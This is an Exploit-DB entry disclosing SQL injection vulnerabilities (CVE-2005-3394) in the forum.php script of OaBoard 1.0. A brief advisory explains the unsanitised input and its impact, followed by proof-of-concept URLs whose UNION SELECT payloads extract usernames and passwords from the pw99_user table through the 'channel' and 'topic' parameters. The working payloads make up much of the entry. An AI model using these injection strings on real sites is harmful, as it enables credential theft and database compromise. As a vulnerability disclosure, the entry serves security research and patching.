OaBoard 1.0 Forum.PHP Multiple SQL Injection Vulnerabilities

2005-10-31T00:00:00
ID EDB-ID:26441
Type exploitdb
Reporter abducter_minds@yahoo.com
Modified 2005-10-31T00:00:00

Description

OaBoard 1.0 Forum.PHP Multiple SQL Injection Vulnerabilities. CVE-2005-3394. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/15245/info

OaBoard is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in an SQL query.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

http://www.example.com/oaboard/forum.php?modul=topics&channel=[SQL]
http://www.example.com/oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1

http://www.example.com/oaboard/forum.php?modul=posting&topic=[SQL]&channel=3
http://www.example.com/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3